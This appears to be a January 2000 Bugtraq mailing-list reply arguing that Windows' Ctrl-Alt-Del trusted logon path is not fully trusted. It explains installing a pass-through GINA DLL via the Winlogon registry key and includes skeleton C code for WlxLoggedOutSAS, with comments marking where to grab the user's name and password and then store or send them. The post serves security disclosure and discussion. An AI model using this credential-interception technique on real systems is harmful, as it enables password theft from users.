That's a good point.
I'd like to add that MS Secure Attention Sequence is not exactly so
trusted.
Nothing prevents another Gina from being put into play, nor prevents
process code injection - DLL API hooking.
One way to do this can be done by altering the reg key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
to implement a Pass-Through Gina (one which grabs your password and then
calls through to the real Gina)
While SAS prevents the old-style pop and disappear logon screens, it does
nothing to prevent password interception by trojan dll injection.
Both of these compromise the trust of the current SAS implemetation.
In light of that, I'm not sure another password path matters.
Just my thoughts,
jdg
Attached is an example of GINA pass-through code - pop the below listed
code into a dll, write the dll name as the value to the above listed key
and SAS now has an untrusted element.
int WINAPI WlxLoggedOutSAS (PVOID pWlxContext, DWORD dwSasType,
PLUID pAuthenticationId, PSID pLogonSid,
PDWORD pdwOptions, PHANDLE phToken,
PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
PVOID *pProfile)
{
//call real gina api
iRet = GWlxLoggedOutSAS (pWlxContext, dwSasType, pAuthenticationId,
pLogonSid,
pdwOptions, phToken, pMprNotifyInfo,
pProfile);
pMprNotifyInfo->pszUserName, <-Grab this
pMprNotifyInfo->pszPassword, <-Grab this
<insert whatever>
hFile = CreateFile (); <-Store it, send it, mail it
WriteFile ();
CloseHandle (hFile);
return iRet;
}
-----Original Message-----
From: David Terrell [SMTP:dbt_at_meat.net]
Sent: Friday, January 21, 2000 3:49 PM
To: BUGTRAQ_at_SECURITYFOCUS.COM
Subject: Windows 2000 Run As... Feature
>this is the first time (I know of) that the system asks for your password
>through a mechanism other than the trusted path (ctrl-alt-del to
>login,
Received on Jan 24 2000
Intro
